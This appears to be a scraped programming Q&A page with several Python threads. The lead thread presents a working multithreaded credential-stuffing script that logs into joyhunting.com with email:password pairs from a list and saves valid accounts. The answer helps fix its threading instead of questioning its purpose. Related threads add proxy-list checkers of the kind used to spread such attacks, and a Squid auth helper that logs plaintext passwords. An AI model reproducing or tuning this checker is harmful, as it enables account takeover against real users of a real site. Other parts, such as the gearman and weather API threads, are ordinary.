python thread queue question

python thread queue question - python

Hell All.
i was made some python script with thread which checking some of account exist in some website
if i run thread 1 , it working well but if increase thread such like 3~5 and above,
result was very different compare with thread 1 and i was checked manually and
if i increase thread result was not correct.
i think some of my thread code have to tune or how about use Queue module ?
anyone can advice or tuneing my script? Thanks in advance!
# -*- coding: cp949 -*-
import sys,os
import mechanize, urllib
import cookielib
import re
from BeautifulSoup import BeautifulSoup,BeautifulStoneSoup,Tag
import re,sys,os,mechanize,urllib,threading,time
# Maximum number of process to spawn at any one given time.
MAX_PROCS =5
maillist = "daum.txt"
threads = []
SAVEFILE = 'valid_joyhunt.txt'
# Threading class
class CheckMyThread ( threading.Thread ):
llemail = ""
llpassword = ""
def __init__ ( self , lemail, lpassword):
self.llemail = lemail
self.llpassword = lpassword
threading.Thread.__init__( self )
pass
def run ( self ):
valid = []
llemail = self.llemail
llpassword = self.llpassword
try:
params = urllib.urlencode({'userid':llemail, 'passwd':llpassword})
rq = mechanize.Request("http://www.joyhunting.com/include/member/login_ok1.asp", params)
rs = mechanize.urlopen(rq)
data = rs.read()
logged_in = r'var _id' in data #정상 로그인
if logged_in :
rq = mechanize.Request("http://www.joyhunting.com/myjoy/new_myjoy.asp")
rs = mechanize.urlopen(rq)
maindata = rs.read(50024)
jun_member = r"준회원"
save = open(SAVEFILE, 'a')
for match in re.finditer(r'<td height="28" colspan="2" style="PADDING-left: 16px">현재 <strong>(.*?)</strong>', maindata):
matched = match.group(1)
for match2 in re.finditer(r"var _gd(.*?);", data):
matched2 = match2.group(1)
print '%s, %s' %(matched, matched2)
break
rq1=mechanize.Request("http://www.joyhunting.com/webchat/applyweb/sendmessage_HPCK_step1.asp?reURL=1&myid="+llemail+"&ToID=undefined&hide=undefined")
rs1=mechanize.urlopen(rq1)
sendmsg= rs1.read()
#print sendmsg
match3 = ''
for match3 in re.finditer(r":'\+(.*?)\);", sendmsg):
matched3 = match3.group(1)
#print matched3
print 'bad'
break
if match3 =='':
save.write('%s, %s, %s:%s ' %(matched, matched2, llemail, llpassword + '\n'))
save.close()
print '[+] Checking: %s:%s -> Good!' % (llemail, llpassword)
else:
print '[-] Checking: %s:%s -> bad account!' % (llemail, llpassword)
return 0
except:
print '[!] Exception checking %s.' % (llemail)
return 1
return 0
try:
listhandle = open(maillist);
#Bail out if the file doesn't exist
except:
print '[!] %s does not exist. Please create the file!' % (maillist)
exit (2)
#Loop through the file
for line in listhandle:
#Parse the line
try:
details = line.split(':')
email = details[0]
password = details[1].replace('\n', '')
#Throw an error and exit.
except:
print '[!] Parse Error in %s on line %n.' % (maillist, currline)
exit
#Run a while statement:
if len(threads) < MAX_PROCS:
#Fork out into another process
print '[ ] Starting thread to check account %s.' % (email);
thread = CheckMyThread(email, password)
thread.start()
threads.append(thread)
else:
#Wait for a thread to exit.
gonext = 0
while 1 == 1:
i = 0
#print '[ ] Checking for a thread to exit...'
while i < len(threads):
#print '[ ] %d' % (i)
try:
if threads[i]:
if not threads[i].isAlive():
#print '[-] Thread %d is dead' % (i)
threads.pop(i)
print '[ ] Starting thread to check account %s.' % (email);
thread = CheckMyThread(email, password)
thread.start()
threads.append(thread)
gonext = 1
break
else:
#print '[+] Thread %d is still running' % (i)
pass
else:
print '[ ] Crap.';
except NameError:
print '[ ] AWWW COME ON!!!!'
i = i + 1
time.sleep(0.050);
if gonext:
break

Can You please specify what are different results?
From what I see, code is doing much more than verifying account.
From what I see, You're appending to a single file from multiple threads, I'd say it's not thread-safe.
Also, AFAIK Mechanize uses shared cookie storage for all requests, so they are probably interfering. Use separate mechanize.Browser() inside run() instead of mechanize.Request().

Related

Keep gearman worker in listening mode after loading file content

I want to keep some file content loaded in memory so that it can be queried in retrived instantly.
In gearman worker, I am loading the file and put it in listening mode. While making request using gearman client, worker returns loaded content only once, next time client receives None
worker :
class GetLexiconFiles(object):
def __init__(self):
self.gm_worker = gearman.GearmanWorker(['localhost:4730'])
self.loadFiles()
self.gm_worker.register_task('load_db', self.task_listener_reverse)
#self.loadFiles()
#self.gm_worker.work()
def task_listener_reverse(self, gearman_worker, gearman_job):
k=float('inf')
#print "Started loading file"
self.input_text = self.input_text.split('\n')
print "Loading completed"
lexicon = defaultdict(list)
for i, line in enumerate(self.input_text):
#print "line is : ", line
if i >= k: break
#if i % 100000 == 0: print >>sys.stderr, i
try:
if line != '':
nl, dbs = line.split(' ', 1)
nl = int(nl)
dbs = self.str2obj(dbs)
lexicon[nl].append(dbs)
else:
pass
except:
print >>sys.stderr, 'could not parse line %r' % line
print traceback.format_exc()
continue
return json.dumps(lexicon)
if __name__ == '__main__':
GetLexiconFiles().gm_worker.work()
client :
def check_request_status(job_request):
if job_request.complete:
#data = json.loads(job_request.result)
print "Job %s finished! Result: %s - %s" % (job_request.job.unique, job_request.state, job_request.result)
elif job_request.timed_out:
print "Job %s timed out!"
elif job_request.state == JOB_UNKNOWN:
print "Job %s connection failed!"
gm_client = gearman.GearmanClient(['localhost:4730'])
tasks = [{'task': 'load_lexicon', 'data': 'This is testing sentence'}, {'task': 'load_db', 'data': 'This is db testing'}]
submitted_requests = gm_client.submit_multiple_jobs(tasks, background=False, wait_until_complete=False)
completed_requests = gm_client.wait_until_jobs_completed(submitted_requests)
print completed_requests[1].result
for completed_job_request in completed_requests:
check_request_status(completed_job_request)

self.input_text = self.input_text.split('\n')
With this line of code you are converting a string to a list of strings.
Since you save the result back in self.input_text the next time that that function gets called self.input_text will already be a list and it'll raise an exception.

Broken Pipe Error on python script with squid

I am running a simple python script to log the accessed url using squid url_rewriter_program.
However every time it runs, rewriter crashes with broken pipe error at sys.stdout.flush().
Please suggest a specific solution.
python code is:
import sys
import os
import io
line = sys.stdin.readline()
fo=open("/home/linux/Desktop/foo1.txt","a")
fo.write(line)
fo.close()
sys.stdout.write("\n")
sys.stdout.flush()

This is a squid redirector file, written on python, can you get, or compare with your script:
Redirector:
#!/usr/bin/env python
# -*- coding: iso-8859-1 -*-
#-----------------------------------------------------------------------------
# Name: redirector_master.py
# Purpose: SiSCont checker cuote
#
# Author: Ernesto Licea Martin
#
# Created: 2011/11/24
# RCS-ID: $Id: redirector_master.py $
# Copyright: (c) 2011
# Licence: GPL
#-----------------------------------------------------------------------------
import sys, string, libSiSCont
__name__= "redirector_master"
query="SELECT accounts_proxyquotatype.name, accounts_proxyaccount.proxy_quota, accounts_proxyaccount.proxy_quota_extra, accounts_proxyaccount.proxy_active, accounts_proxyaccounttype.name FROM accounts_proxyaccount INNER JOIN accounts_proxyaccounttype INNER JOIN accounts_proxyquotatype ON (accounts_proxyaccount.proxy_quota_type_id = accounts_proxyquotatype.id) AND (accounts_proxyaccount.proxy_account_type_id = accounts_proxyaccounttype.id) WHERE accounts_proxyaccount.proxy_username=%s"
class RedirMaster:
def __init__(self):
obj = libSiSCont.ParceConf()
obj.parcecfgfile()
self.__listModules = obj.getModList()
self.__redirDicc = obj.getRedirectURL()
self.__penalURL = obj.getPenalizedURL()
self.__confDicc = obj.getConfParam()
self.__dbDicc = obj.getDBDicc()
self.__proxyDicc = obj.getProxyCacheParam()
self.__dbParam = []
def getProxyTypes(self):
db=libSiSCont.connectDB(dbDicc=self.__dbDicc)
c=db.cursor()
c.execute("SELECT accounts_proxy")
def run(self):
modules=[]
for mod in self.__listModules:
try:
m=__import__(mod)
modules.append(m)
except Exception, e:
libSiSCont.reportLogs("%s.run" %__name__, 'Unable to load redirector module %s; the error was: %s' % (mod,str(e)))
if len(modules) == 0:
libSiSCont.reportLogs("%s.run" %__name__, 'No usable redirector module found; switching to trasparent behavour')
while 1:
try:
data_redir=raw_input()
data_redir=data_redir.split()
url,ip_host,user,method,urlgroup = data_redir[0:5]
ip=ip_host.split("/")[0]
host_name=ip_host.split("/")[1]
uri = url
mode=""
#Don't check cache access
if string.find(url,"cache_object") == 0:
sys.stdout.write("%s%s\n" %(mode,uri))
sys.stdout.flush()
continue
db=libSiSCont.connectDB(dbDicc=self.__dbDicc)
c=db.cursor()
c.execute(query,user)
cuote_type,cuote, ext_cuote, active, acc_type = c.fetchall()[0]
self.__dbParam=[cuote_type,int(cuote), int(ext_cuote), active, acc_type]
for module in modules:
try:
uri = module.redir(url = url, ip = ip, host_name = host_name, user = user, method = method, urlgroup = urlgroup, redirDicc = self.__redirDicc, penalURL = self.__penalURL, confDicc = self.__confDicc, proxyDicc = self.__proxyDicc, dbParam = self.__dbParam)
except Exception, e:
libSiSCont.reportLogs("%s.run" %__name__, 'Error while running module: %s -- The error was: %s' % (module,str(e)))
if uri != url:
mode = "301:"
break
sys.stdout.write("%s%s\n" %(mode,uri))
sys.stdout.flush()
except Exception, e:
if not string.find('%s' % e,'EOF') >= 0:
sys.stdout.write('%s\n' % uri)
sys.stdout.flush()
libSiSCont.reportLogs("%s.run" %__name__, '%s: data received from parent: %s' % (str(e),string.join(data_redir)))
else:
sys.exit()
obj=RedirMaster()
obj.run()
Helper:
#!/usr/bin/env python
import sys, syslog, libSiSCont, string,crypt
__name__ = "Helper"
query = "SELECT accounts_proxyaccount.proxy_username FROM accounts_proxyaccount WHERE accounts_proxyaccount.proxy_username=%s AND accounts_proxyaccount.proxy_password=%s"
class BasicAuth:
def __init__(self):
obj = libSiSCont.ParceConf()
obj.parcecfgfile()
self.__dbDicc = obj.getDBDicc()
def run(self):
while 1:
try:
user_pass = string.split(raw_input())
user = user_pass[0].strip("\n")
passwd = user_pass[1].strip("\n")
crypt_passwd = crypt.crypt(passwd,user)
db = libSiSCont.connectDB(self.__dbDicc)
c = db.cursor()
c.execute(query,(user,crypt_passwd))
if c.fetchone() == None:
libSiSCont.reportLogs('%s.run' %__name__,'User Authentication Fail, user = %s password= %s, Access Denied' %(user,passwd) )
sys.stdout.write("ERR\n")
sys.stdout.flush()
else:
libSiSCont.reportLogs('%s.run' %__name__, 'User Authentication Success, user = %s, Access Granted' %user)
sys.stdout.write("OK\n")
sys.stdout.flush()
except Exception, e:
if not string.find("%s" %e, "EOF") >= 0:
sys.stdout.write("ERR\n")
sys.stdout.flush()
libSiSCont.reportLogs('%s.run' %__name__, 'Authenticator error, user will navigate without authentication: %s' %str(e))
else:
sys.exit()
obj = BasicAuth()
obj.run()
I hope help you ;-)

python calling apis events and printing randomly

I have a interval of 60 and wanted to print 6 events every 1 minutes. But it prints 11,12 and 13 events randomly every 1 minutes. Why is that so ? Is it because of my codes or what other factors can cause this ?
My code is -
import logging
import httplib
import simplejson as json
import socket
import time
import datetime
import urllib2
import sys
import xml.dom.minidom
from bs4 import BeautifulSoup as soup
SCHEME = """<scheme>
<title>testingCurrentWeatherSG</title>
<description>Get data from forecast.</description>
<use_external_validation>true</use_external_validation>
<streaming_mode>simple</streaming_mode>
<endpoint>
<args>
<arg name="intervalone">
<title>Intervalone</title>
<description>How long to refresh this query?</description>
</arg>
</args>
</endpoint>
</scheme>
"""
def do_scheme():
print SCHEME
## Utility functions
def fahrenheit(fahren):
return (fahren-32) * 5.0/9.0
def get_percent(num):
return num * 100.
## Responses
def get_response(conn, url):
try:
conn.request('GET', url)
result = conn.getresponse()
data = result.read()
return json.loads(data)
except socket.timeout:
return None
## Printing
def print_forecast(name, di):
# Print the forcast from 'di', for location 'name'
# name is the name of the location, di is the api response
psi_avg=20
current = di['currently']
for key, value in sorted(current.iteritems()):
if key in ['cloudCover', 'icon', 'ozone', 'precipIntensity', # time
'precipProbability', 'precipType', 'pressure', 'summary',
'visibility', 'windBearing', 'windSpeed']:
print '{0} : {1}'.format(key, value)
elif key in ['temperature', 'dewPoint']:
print '%s: %.2f' % (key, fahrenheit(value))
elif key == 'humidity':
print '%s: %.2f' % (key, get_percent(value))
print 'psiAverage : ' + str(psi_avg)
print 'latitude : ' + str(di['latitude'])
print 'longitude : ' + str(di['longitude'])
print 'location : ' + str(name)
print
def weather_Connection(intervalone):
host = 'api.forecast.io'
conn = httplib.HTTPSConnection(host, timeout=60) # adjust timeout as desired
try:
urlnyp = '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.37871,103.848808'
conn.request('GET', urlnyp)
resultnyp = conn.getresponse()
contentnyp = resultnyp.read()
except socket.timeout:
print 'socket timeout'
return
# the locations and urls for the api calls
urls = {
'Choa Chu Kang': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.394557,103.746396',
'Kallang': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.311469,103.871399',
'Jurong West': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.352008,103.698599',
'Redhill': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.289732,103.81675',
'Tampines': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.353092,103.945229',
'Yishun': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.429463,103.84022',
}
responses = {}
for i, (name, url) in enumerate(sorted(urls.iteritems())):
response = get_response(conn, url)
if not response:
print 'socket timeout on url#%d: %s' % (i, url)
return
responses[name] = response
conn.close()
# print the forecast
for name, data in responses.iteritems():
print_forecast(name, data)
def get_config():
#Read XML Configuration data passed from splunkd on stdin
config = {}
try:
# read everything from stdin
config_str = sys.stdin.read()
# parse the config XML
doc = xml.dom.minidom.parseString(config_str)
root = doc.documentElement
conf_node = root.getElementsByTagName("configuration")[0]
if conf_node:
logging.debug("XML: found configuration")
stanza = conf_node.getElementsByTagName("stanza")[0]
if stanza:
stanza_name = stanza.getAttribute("name")
if stanza_name:
logging.debug("XML: found stanza " + stanza_name)
config["name"] = stanza_name
params = stanza.getElementsByTagName("param")
for param in params:
param_name = param.getAttribute("name")
logging.debug("XML: found param '%s'" % param_name)
if param_name and param.firstChild and \
param.firstChild.nodeType == param.firstChild.TEXT_NODE:
data = param.firstChild.data
config[param_name] = data
logging.debug("XML: '%s' -> '%s'" % (param_name, data))
if not config:
raise Exception, "Invalid configuration received from Splunk."
except Exception, e:
raise Exception, "Error getting Splunk configuration via STDIN: %s" % str(e)
return config
def run():
#The Main function that starts the action. The thread will sleep for however many seconds are configured via the Input.
# config = get_config()
#
#
# intervalone = config["intervalone"]
intervalone =60
while True:
weather_Connection(intervalone)
logging.info("Sleeping for %s seconds" %(intervalone))
time.sleep(float(intervalone))
if __name__ == '__main__':
if len(sys.argv) > 1:
if sys.argv[1] == "--scheme":
do_scheme()
else:
run()
sys.exit(0)

I've checked and tried your code and it works fine. Try replacing
logging.info("Sleeping for %s seconds" %(intervalone))
with
print("Sleeping for %s seconds" % (intervalone))
You should see this statement every 6 forecasts.
Note: why returning from weather_Connection() here
for i, (name, url) in enumerate(sorted(urls.iteritems())):
response = get_response(conn, url)
if not response:
print 'socket timeout on url#%d: %s' % (i, url)
return
responses[name] = response
You can just skip it with continue
for i, (name, url) in enumerate(sorted(urls.iteritems())):
response = get_response(conn, url)
if not response:
print 'socket timeout on url#%d: %s' % (i, url)
continue
responses[name] = response

python proxy list check

i have some text file which contain proxy ip .
which look like following
130.14.29.111:80
130.14.29.120:80
130.159.235.31:80
14.198.198.220:8909
141.105.26.183:8000
160.79.35.27:80
164.77.196.75:80
164.77.196.78:45430
164.77.196.78:80
173.10.134.173:8081
174.132.145.80:80
174.137.152.60:8080
174.137.184.37:8080
174.142.125.161:80
after processing check this proxy , then i want to marked as following
total number of '0' = 8
total number of 'x' = 6
percentage = alive 60% , dead 40%
x 130.14.29.111:80
0 130.14.29.120:80
0 130.159.235.31:80
0 14.198.198.220:8909
0 141.105.26.183:8000
0 160.79.35.27:80
x 164.77.196.75:80
x 164.77.196.78:45430
x 164.77.196.78:80
0 173.10.134.173:8081
0 174.132.145.80:80
0 174.137.152.60:8080
x 174.137.184.37:8080
x 174.142.125.161:80
how can be done with python? or some sample
if anyone would help me or enlight me much aprreciate!
i was edited
this is script source of what i have
finally check finished proxy list are saved to 'proxy_alive.txt'
in this file i want to mark whether proxy element alive or not.
import socket
import urllib2
import threading
import sys
import Queue
import socket
socket.setdefaulttimeout(7)
print "Bobng's proxy checker. Using %s second timeout"%(socket.getdefaulttimeout())
#input_file = sys.argv[1]
#proxy_type = sys.argv[2] #options: http,s4,s5
#output_file = sys.argv[3]
input_file = 'proxylist.txt'
proxy_type = 'http'
output_file = 'proxy_alive.txt'
url = "www.seemyip.com" # Don't put http:// in here, or any /'s
check_queue = Queue.Queue()
output_queue = Queue.Queue()
threads = 20
def writer(f,rq):
while True:
line = rq.get()
f.write(line+'\n')
def checker(q,oq):
while True:
proxy_info = q.get() #ip:port
if proxy_info == None:
print "Finished"
#quit()
return
#print "Checking %s"%proxy_info
if proxy_type == 'http':
try:
listhandle = open("proxylist.txt").read().split('\n')
for line in listhandle:
saveAlive = open("proxy_alive.txt", 'a')
details = line.split(':')
email = details[0]
password = details[1].replace('\n', '')
proxy_handler = urllib2.ProxyHandler({'http':proxy_info})
opener = urllib2.build_opener(proxy_handler)
opener.addheaders = [('User-agent','Mozilla/5.0')]
urllib2.install_opener(opener)
req = urllib2.Request("http://www.google.com")
sock=urllib2.urlopen(req, timeout= 7)
rs = sock.read(1000)
if '<title>Google</title>' in rs:
oq.put(proxy_info)
print '[+] alive proxy' , proxy_info
saveAlive.write(line)
saveAlive.close()
except urllib2.HTTPError,e:
print 'url open error? slow?'
pass
except Exception,detail:
print '[-] bad proxy' ,proxy_info
else:
# gotta be socks
try:
s = socks.socksocket()
if proxy_type == "s4":
t = socks.PROXY_TYPE_SOCKS4
else:
t = socks.PROXY_TYPE_SOCKS5
ip,port = proxy_info.split(':')
s.setproxy(t,ip,int(port))
s.connect((url,80))
oq.put(proxy_info)
print proxy_info
except Exception,error:
print proxy_info
threading.Thread(target=writer,args=(open(output_file,"wb"),output_queue)).start()
for i in xrange(threads):
threading.Thread(target=checker,args=(check_queue,output_queue)).start()
for line in open(input_file).readlines():
check_queue.put(line.strip('\n'))
print "File reading done"
for i in xrange(threads):
check_queue.put(None)
raw_input("PRESS ENTER TO QUIT")
sys.exit(0)

Is this what you want?
#!/usr/bin/env python
import Queue
import threading
import urllib2
import time
input_file = 'proxylist.txt'
threads = 10
queue = Queue.Queue()
output = []
class ThreadUrl(threading.Thread):
"""Threaded Url Grab"""
def __init__(self, queue):
threading.Thread.__init__(self)
self.queue = queue
def run(self):
while True:
#grabs host from queue
proxy_info = self.queue.get()
try:
proxy_handler = urllib2.ProxyHandler({'http':proxy_info})
opener = urllib2.build_opener(proxy_handler)
opener.addheaders = [('User-agent','Mozilla/5.0')]
urllib2.install_opener(opener)
req = urllib2.Request("http://www.google.com")
sock=urllib2.urlopen(req, timeout= 7)
rs = sock.read(1000)
if '<title>Google</title>' in rs:
output.append(('0',proxy_info))
else:
raise "Not Google"
except:
output.append(('x',proxy_info))
#signals to queue job is done
self.queue.task_done()
start = time.time()
def main():
#spawn a pool of threads, and pass them queue instance
for i in range(5):
t = ThreadUrl(queue)
t.setDaemon(True)
t.start()
hosts = [host.strip() for host in open(input_file).readlines()]
#populate queue with data
for host in hosts:
queue.put(host)
#wait on the queue until everything has been processed
queue.join()
main()
for proxy,host in output:
print proxy,host
print "Elapsed Time: %s" % (time.time() - start)

text file processing with python

i have some text file which contain proxy ip .
which look like following
130.14.29.111:80
130.14.29.120:80
130.159.235.31:80
14.198.198.220:8909
141.105.26.183:8000
160.79.35.27:80
164.77.196.75:80
164.77.196.78:45430
164.77.196.78:80
173.10.134.173:8081
174.132.145.80:80
174.137.152.60:8080
174.137.184.37:8080
174.142.125.161:80
after processing check this proxy , then i want to marked as following
total number of '0' = 8
total number of 'x' = 6
percentage = alive 60% , dead 40%
x 130.14.29.111:80
0 130.14.29.120:80
0 130.159.235.31:80
0 14.198.198.220:8909
0 141.105.26.183:8000
0 160.79.35.27:80
x 164.77.196.75:80
x 164.77.196.78:45430
x 164.77.196.78:80
0 173.10.134.173:8081
0 174.132.145.80:80
0 174.137.152.60:8080
x 174.137.184.37:8080
x 174.142.125.161:80
how can be done with python? or some sample
if anyone would help me or enlight me much aprreciate!
i was edited
this is script source of what i have
finally check finished proxy list are saved to 'proxy_alive.txt'
in this file i want to mark whether proxy element alive or not.
import socket
import urllib2
import threading
import sys
import Queue
import socket
socket.setdefaulttimeout(7)
print "Bobng's proxy checker. Using %s second timeout"%(socket.getdefaulttimeout())
#input_file = sys.argv[1]
#proxy_type = sys.argv[2] #options: http,s4,s5
#output_file = sys.argv[3]
input_file = 'proxylist.txt'
proxy_type = 'http'
output_file = 'proxy_alive.txt'
url = "www.seemyip.com" # Don't put http:// in here, or any /'s
check_queue = Queue.Queue()
output_queue = Queue.Queue()
threads = 20
def writer(f,rq):
while True:
line = rq.get()
f.write(line+'\n')
def checker(q,oq):
while True:
proxy_info = q.get() #ip:port
if proxy_info == None:
print "Finished"
#quit()
return
#print "Checking %s"%proxy_info
if proxy_type == 'http':
try:
listhandle = open("proxylist.txt").read().split('\n')
for line in listhandle:
saveAlive = open("proxy_alive.txt", 'a')
details = line.split(':')
email = details[0]
password = details[1].replace('\n', '')
proxy_handler = urllib2.ProxyHandler({'http':proxy_info})
opener = urllib2.build_opener(proxy_handler)
opener.addheaders = [('User-agent','Mozilla/5.0')]
urllib2.install_opener(opener)
req = urllib2.Request("http://www.google.com")
sock=urllib2.urlopen(req, timeout= 7)
rs = sock.read(1000)
if '<title>Google</title>' in rs:
oq.put(proxy_info)
print '[+] alive proxy' , proxy_info
saveAlive.write(line)
saveAlive.close()
except urllib2.HTTPError,e:
print 'url open error? slow?'
pass
except Exception,detail:
print '[-] bad proxy' ,proxy_info
else:
# gotta be socks
try:
s = socks.socksocket()
if proxy_type == "s4":
t = socks.PROXY_TYPE_SOCKS4
else:
t = socks.PROXY_TYPE_SOCKS5
ip,port = proxy_info.split(':')
s.setproxy(t,ip,int(port))
s.connect((url,80))
oq.put(proxy_info)
print proxy_info
except Exception,error:
print proxy_info
threading.Thread(target=writer,args=(open(output_file,"wb"),output_queue)).start()
for i in xrange(threads):
threading.Thread(target=checker,args=(check_queue,output_queue)).start()
for line in open(input_file).readlines():
check_queue.put(line.strip('\n'))
print "File reading done"
for i in xrange(threads):
check_queue.put(None)
raw_input("PRESS ENTER TO QUIT")
sys.exit(0)

You can use a queue to queue all the list of address and their meta information.
After you are done with your operation on this ip addresses, you can write it back to the same file with 'w' mode.
[ ( ip-address-1,'x' ), ( ip-address-2, '0'), ...... ]

Develop Reference

Python is a programming language that lets you work quickly and integrate systems more effectively.

python thread queue question - python

Related

Keep gearman worker in listening mode after loading file content

Broken Pipe Error on python script with squid

python calling apis events and printing randomly

python proxy list check

text file processing with python

Categories

Resources